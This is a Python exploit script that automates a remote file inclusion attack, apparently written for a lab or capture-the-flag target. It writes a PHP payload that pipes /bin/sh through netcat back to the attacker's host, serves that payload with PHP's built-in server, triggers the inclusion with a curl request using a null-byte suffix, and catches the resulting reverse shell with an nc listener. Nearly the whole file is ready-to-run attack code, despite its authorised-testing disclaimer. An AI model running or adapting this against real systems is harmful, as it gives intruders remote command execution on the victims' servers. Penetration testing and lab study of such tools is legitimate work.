#!/usr/bin/env python2
# -*- coding: utf-8 -*-
###############################################################################
# DESCRIPTION                                                                 #
# Automates a remote file inclusion (RFI) attack: serves a PHP reverse-shell  #
# payload over HTTP (php -S), asks the vulnerable page to include it, and     #
# catches the resulting shell with a local netcat listener.                   #
#                                                                             #
# For use only against systems you are explicitly authorised to test.         #
###############################################################################
import os
import signal
import subprocess
import sys
import time
from multiprocessing import Process
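# Handler to exit cleanly on Ctrl+C
def signal_handler(signum, frame):
    """Exit on SIGINT.

    ``signum`` and ``frame`` are the standard signal-handler arguments and
    are unused.  Raises SystemExit via ``sys.exit()``.  Because the worker
    processes below are started with ``multiprocessing.Process``, they are
    expected to inherit this handler on fork-based platforms, so a Ctrl+C in
    the terminal should stop them as well (confirm on the platform in use).
    """
    # print() rather than the Python 2 print statement, matching the rest of
    # the file and keeping the script importable under Python 3.
    print("\nYou pressed Ctrl+C!")
    sys.exit()
signal.signal(signal.SIGINT, signal_handler)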
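# Port for the payload-serving HTTP listener; override with HTTP_PORT=<port>.
# Kept as a string because it is only ever interpolated into URLs/commands.
HTTP_PORT = os.environ.get('HTTP_PORT', '8000')
# The value ends up on a command line and in the URL sent to the target, so
# accept nothing but a plain port number.
if not HTTP_PORT.isdigit() or not 0 < int(HTTP_PORT) < 65536:
    sys.exit("[-] HTTP_PORT must be a TCP port number, got %r" % HTTP_PORT)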
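def build_payload(lhost=None, lport=None, path='/tmp/evil.txt'):
    """Write the PHP reverse-shell payload that the target will include.

    The payload calls ``shell_exec`` on the target and pipes ``/bin/sh``
    through ``nc`` back to ``lhost:lport``.  ``lhost``/``lport`` default to
    the module globals ``LHOST``/``LPORT`` set in ``__main__``.  ``path`` is
    where the file is written; it must live under the directory that
    ``HttpListener`` serves (``/tmp`` by default).

    Returns the payload text that was written.
    """
    if lhost is None:
        lhost = LHOST
    if lport is None:
        lport = LPORT
    payload = '''<?php echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f");?>''' % (lhost, lport)
    # The default location is a predictable name in the shared /tmp: refuse to
    # follow a symlink planted there by another local user, and keep the file
    # readable by this user only (php -S runs as the same user, so it can still
    # serve it).  fchmod also tightens a file left behind by an earlier run.
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, 'O_NOFOLLOW', 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, 'w') as f:
        os.fchmod(fd, 0o600)
        f.write(payload)
    return payload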
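def HttpListener(port=None, docroot='/tmp'):
    """Serve ``docroot`` over HTTP with PHP's built-in server (blocks).

    ``port`` defaults to the HTTP_PORT environment variable, else 8000.  The
    server binds to every interface so the target can reach it; note that it
    exposes everything under ``docroot`` -- by default the shared /tmp, where
    ``build_payload`` writes evil.txt -- for as long as it runs, and PHP's
    built-in server will also execute .php files found there.  Keep the run
    short and prefer a dedicated directory where possible.
    """
    if port is None:
        port = os.environ.get('HTTP_PORT', '8000')
    os.chdir(docroot)
    # Print before starting the server: php -S blocks, so a message placed
    # after it would never appear while the listener is up.
    print("[+] HTTP Listen = %s" % port)
    # Let Process.terminate() (SIGTERM) unwind through the finally below
    # instead of leaving an orphaned php process behind.
    signal.signal(signal.SIGTERM, lambda *_: sys.exit(0))
    # Argument list rather than a shell string: port/docroot cannot be turned
    # into extra shell commands.
    server = subprocess.Popen(['php', '-S', '0.0.0.0:%s' % port])
    try:
        server.wait()
    finally:
        if server.poll() is None:
            server.terminate()
            server.wait()
def exploit(host=None, lhost=None, port=None, delay=5):
    """Trigger the inclusion by requesting the vulnerable URL.

    Waits ``delay`` seconds for ``HttpListener`` to come up, then requests
    ``<host>=http://<lhost>:<port>/evil.txt%00``.  ``host`` is the target URL
    up to and including the name of the included parameter (for example
    ``https://10.10.10.59/section.php?page``).  The trailing ``%00`` is
    presumably the null-byte truncation trick for include paths that get a
    suffix appended; confirm it is needed for the target.  Arguments default
    to the module globals ``HOST``/``LHOST`` and the HTTP_PORT environment
    variable.  Blocks for as long as the target keeps the request open.
    """
    if host is None:
        host = HOST
    if lhost is None:
        lhost = LHOST
    if port is None:
        port = os.environ.get('HTTP_PORT', '8000')
    time.sleep(delay)
    print('[+] Exploit')
    url = '%s=http://%s:%s/evil.txt%%00' % (host, lhost, port)
    # Argument list, not a shell string: the URL carries '?', '=' and possibly
    # '&', which a shell would otherwise interpret.
    # --insecure disables TLS certificate verification (lab targets with
    # self-signed certs); it also means this request can be intercepted or
    # redirected by anyone on the path.
    subprocess.call(['curl', '--insecure', '-s', url])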
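if __name__ == '__main__':
    if len(sys.argv) != 4:
        # The usage text must match the argument count checked above (the
        # script never took a username/password).
        print("Usage: %s <HOST> <LHOST> <LPORT>" % (sys.argv[0]))
        print("\n  HOST   target URL up to the included parameter name")
        print("  LHOST  address the target connects back to (reachable from the target)")
        print("  LPORT  local port for the reverse-shell listener")
        print("\nEXAMPLE: %s https://10.10.10.59/section.php?page 10.10.14.24 1337\n" % (sys.argv[0]))
        sys.exit(1)
    HOST = sys.argv[1]
    LHOST = sys.argv[2]
    LPORT = sys.argv[3]
    # LPORT is interpolated into the PHP payload and the nc command line;
    # insist on a plain port number so nothing else can ride along.
    if not LPORT.isdigit() or not 0 < int(LPORT) < 65536:
        sys.exit("[-] LPORT must be a TCP port number, got %r" % LPORT)
    print("[+] LHOST = %s" % LHOST)
    build_payload()
    # Serve payload
    server = Process(target=HttpListener)
    server.start()
    # Trigger the inclusion; exploit() sleeps first so the server is up.
    trigger = Process(target=exploit)
    trigger.start()
    print("[+] Netcat = %s" % LPORT)
    try:
        # Argument list, not a shell string: LPORT cannot inject commands.
        # The listener only starts here, after the trigger process; the delay
        # inside exploit() is what keeps the callback from racing it.
        subprocess.call(['nc', '-lnvp', LPORT])
    finally:
        # Both child processes used to be leaked (the handle was overwritten
        # and never joined), leaving php -S serving /tmp on 0.0.0.0 after the
        # shell was gone.  Stop them once the listener returns.
        for child in (trigger, server):
            if child.is_alive():
                child.terminate()
            child.join()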